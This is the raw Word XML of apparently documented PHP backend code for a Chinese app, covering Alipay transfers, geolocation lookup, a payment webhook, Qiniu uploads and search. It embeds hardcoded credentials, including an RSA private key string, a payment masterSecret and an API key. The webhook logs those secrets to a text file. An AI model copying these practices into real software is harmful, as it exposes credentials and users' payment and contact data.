    <w:p w14:paraId="3012D2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'rsaPrivateKey' =&gt; 'MIIEowIBQEAuBibpO/ICQg9yBzVmGfKQxiL7PRAb8Sf+cG0lKC0PCXkx7IwPy/2UFVk5COlY1AchUibYBbIrL1z2R9TMmtCyrLy9eury3ELjDiy/qMEYtmeRSDLhn0wsHx3VLxJFw2pjbPfxfim47lh+AjI9KTv67HtJT0Lbjhb9O6svvQusg+DF87Z95/d6WT9YOgfp39Ok3USw8NO7Wr/PK2a8E8No',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D22A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CCDA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$aop-&gt;gatewayUrl = $config['gatewayUrl'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E2AC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$aop-&gt;appId = $config['appId'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400A49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$aop-&gt;rsaPrivateKey = $config['rsaPrivateKey'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A21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$aop-&gt;alipayrsaPublicKey = $config['alipayrsaPublicKey'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C0C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$aop-&gt;apiVersion = '1.0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F54E8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$aop-&gt;signType = 'RSA2';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176D3E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$aop-&gt;postCharset = 'utf-8';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551508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$aop-&gt;format = 'json';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E107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new \AlipayFundTransToaccountTransferRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF30E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$request-&gt;setBizContent("{" .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60716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"\"out_biz_no\":\"$out_biz_no\"," .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795649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"\"payee_type\":\"ALIPAY_LOGONID\"," .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E60FB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"\"payee_account\":\"$payee_account\"," .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699D24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"\"amount\":\"$amount\"," .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C97F6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"\"payer_show_name\":\"$payer_show_name\"," .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD58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"\"payee_real_name\":\"$payee_real_name\"," .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2688F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"\"remark\":\"$remark\"" .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CE2A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40FA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$aop-&gt;execute($request);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E9A6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dump($result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699B1B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$responseNode = str_replace(".", "_", $request-&gt;getApiMethodName()) . "_response";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8CE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$resultCode = $result-&gt;$responseNode-&gt;code;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D901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dump($resultCode);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B80E5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(!empty($resultCode) &amp;&amp; $resultCode == 10000) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF61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0DE6A9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50EBB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2DBD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DB03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cityDingwei()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371DB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FC65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$latitude = input('latitude') ? input('latitude') : '39.904214';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CF6C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$longitude = input('longitude') ? input('longitude') : '116.40741300000002';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A739B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$longitude . ',' . $latitude;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20293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(!$latitude || !$longitude) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FB56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D22EE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170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'3cf31d82a4e39b85226519b62471fa10';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E33C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file_get_contents('https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B0E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json_decode($data, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58838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($data['status'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AF42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$city = !empty($data['regeocode']['addressComponent']['city']) ? $data['regeocode']['addressComponent']['city'] : $data['regeocode']['addressComponent']['province'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06968C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$city = str_replace('</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>市</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>', '', $city);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588C81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$city]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214650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8F2F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0D1F83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$latitude = input('latitude') ? input('latitude') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D10D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$longitude = input('longitude') ? input('longitude') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD83F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$getData = file_get_contents('http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FBFB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$getData = json_decode($getData, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F80D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($getData['status'] == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643C87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$city = $getData['result']['addressComponent']['city'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01248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$city = str_replace('</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>市</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>', '', $city);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EF01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$city]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791CF3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B614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4C73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encrypt()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79ED50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2FCC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Db::name('member')-&gt;where(['mobile' =&gt; '15622289461'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B8F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$member['id'] . '|www.ffxiang.cn|' . $member['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2625FC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_encrypt($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A564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C067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53F1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支付通知处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72756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010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type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6CC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424F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notifyWebhook()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6802A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39E2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Db::transaction(function () {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB879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$appId = '0bb64709-660c-46ab-b408-30c851315139';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13279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$masterSecret = '31377893-2f54-44d8-bf30-49a081acb031';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BD00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$jsonStr = file_get_contents("php:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD2A3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$msg = json_decode($jsonStr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE50E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$sign = md5($appId . $msg-&gt;transaction_id . $msg-&gt;transaction_type . $msg-&gt;channel_type . $msg-&gt;transaction_fee . $masterSecret);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575CE9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($sign != $msg-&gt;signature) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226E0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$data['msg'] = $msg;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F797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$data['ip'] = _ip();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F863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$data['sign'] = $sign;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0E3E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$data['signature'] = $msg-&gt;signature;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7E5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$data['appId'] = $appId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461821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$data['masterSecret'] = $masterSecret;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D62D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file_put_contents("notifyWebhook.txt", var_export($data, true) . "\r\n=====================================================================\r\n\r\n=====================================================================\r\n", FILE_APPEND);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AA30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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>头条开发</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>QQ</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1424445608');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790363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12067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($msg-&gt;transaction_type == "PAY") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCBB3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$status = $msg-&gt;trade_success;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAC14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(!$status) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8F01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2282F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B260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58372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$where['code'] = $msg-&gt;transaction_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AB4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 = $msg-&gt;transaction_fee;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6179A3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$msg-&gt;optional-&gt;uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127ED4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 = $msg-&gt;sub_channel_type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BB6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$where['status'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE56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Db::name('pay_record')-&gt;where($where)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641952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A6C39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Db::name('pay_record')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EE3E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$db['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D231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74AEF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'status' =&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781324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'update_time' =&gt; time(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11613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=&gt; $jsonStr,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A47CD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943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(!empty($msg-&gt;optional-&gt;dizhiId)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440F3C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$db['dizhiId'] = $msg-&gt;optional-&gt;dizhiId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178C9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2509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$this-&gt;memberData($db);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FED54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BD3B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9414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ECD6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F57F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memberData($db)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3394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CAC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9B2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=&gt; $db['uid']])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBA97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-&gt;setInc('zhibo_zuan', $db['money'] / 100);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A64B7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'success';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D8AD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773F9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2B46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/api/index/image_upload </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上传图片</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224278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上传图片</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2599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通用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8649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6ADA6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{File} image       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上传图片</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEBBF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返回数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25207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image   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>七牛图片文件名（</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>eg. 042e820210812091212723761.jpg</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CD7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preview </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>预览图片</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE3E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上传失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF828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3CA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image_upload()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C215A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9BE1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(request()-&gt;file('image')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252735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6C4DC9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7F476A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(!$filePath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DAE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711DF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非法操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B43A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34436F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220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CA0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0BFE4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 = ['jpg', 'png', 'gif', 'jpeg', 'JPEG', 'JPG', 'GIF', 'PNG'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34173B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(!in_array($ext, $geshi)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4639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322D6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1A97D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4DF33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C5A4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4D00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substr(md5($file-&gt;getRealPath()), 0, 5) . date('YmdHis') . rand(100, 999999) . '.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10148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7F42A1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3A42B6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2C54E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507F0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357E48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48B889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$db['3']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6F4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497560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36F94B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14D5B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65759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C0265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$err,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F8AD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092BCB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39E8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891E9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B9B1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=&gt; $ret['key'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE4B9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'preview' =&gt; _imgUrl() . $ret['key'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679B87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JSON_UNESCAPED_SLASHES);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AA35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0D947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$qiniu_url . $ret['key'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8769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D811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1768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81973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37862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上传图片不得为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C66F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05C475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DE3F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460B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2D9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429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/api/index/video_upload </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上传视频</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355E7A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上传视频</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048F9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通用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D9D3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99A31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{File} video   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上传视频</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B705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返回数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0E49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video   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>视频</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422BE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preview </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>预览视频</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A47C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上传失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F896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8982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video_uploads()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37686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3B3C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(request()-&gt;file('video')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477E7A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5A3543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487E5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3309F3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1FDD4C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07C289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4D281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$pipeline = $db['4']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175B4A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$db['5']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244DF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5D32A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$savekey = \Qiniu\base64_urlSafeEncode($bucket);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A878D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$fops . '|saveas/' . $savekey;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4870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$wenurl = config()['appConfig']['url'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F138E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$policy = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C44CE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'persistentOps' =&gt; $fops,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ADD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'persistentPipeline' =&gt; $pipeline,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5534F9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'persistentNotifyUrl' =&gt; $wenurl . '/index.php/api/index/notify',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5C2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4C7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$uptoken = $auth-&gt;uploadToken($bucket, null, 3600, $policy);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB691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request()-&gt;file('video');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EFF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0A7C5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5F53BD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$uploadMgr-&gt;putFile($uptoken, null, $filePath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A937D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774C5C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4782E9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失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0450A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469D1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8FE2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CFB91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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0253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 =&gt; $ret['key'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763E9A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'preview' =&gt; _imgUrl() . $ret['key'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABFCB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JSON_UNESCAPED_SLASHES);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE7A3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73F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3303E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DD05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上传视频不得为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362FEF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06D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22C7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582F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31C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/api/index/hotsearchkw </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>热搜关键字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010134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热搜关键字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263C4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通用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727A45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热搜关键词，多个关键词使用英文</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分隔</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CEA6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暂无热搜词</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD50B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255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hotsearchkw(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7022F5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$kw=config()['appConfig']['guanjianci'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081E63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json($kw?['ret'=&gt;$kw]:['err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>暂无热搜词</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EAAF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51A4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287C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/api/index/search </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>全局搜索</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D432F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全局搜索</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657375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通用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197FF1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C69E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66EB99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keyword       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>搜索关键字（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777AB9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搜索结果数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1F0A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coins          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D93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members         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E80F4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circles         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4424E6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platform        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AE69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articles        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFFD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circle_articles </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215855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54D9D7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1EF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search()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74139B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529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 = input('param.keyword', '', 'strip_tags,trim');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC00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($keyword == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D70F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D67AA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搜索关键字不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1043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4012F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88DB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9663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$data['members'] = Db::name('member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0266E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-&gt;field('password', true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB795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-&gt;where('nickname', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E3E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-&gt;whereOr('user', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C8A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-&gt;whereOr('mobile', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A362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1AC99B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(count($data['members']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436E6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($data['members'] as $key =&gt; $member) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7AD7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$data['members'][$key]['img'] = $member['img'] ? _imgUrl().$member['img'] : '/public/style/index/member/img/userimg.gif';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9872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713B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F1B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$data['coins'] = Db::name('coin')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FCE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-&gt;where('currency', 'like', '%' . $keyword . '%')</w:t>
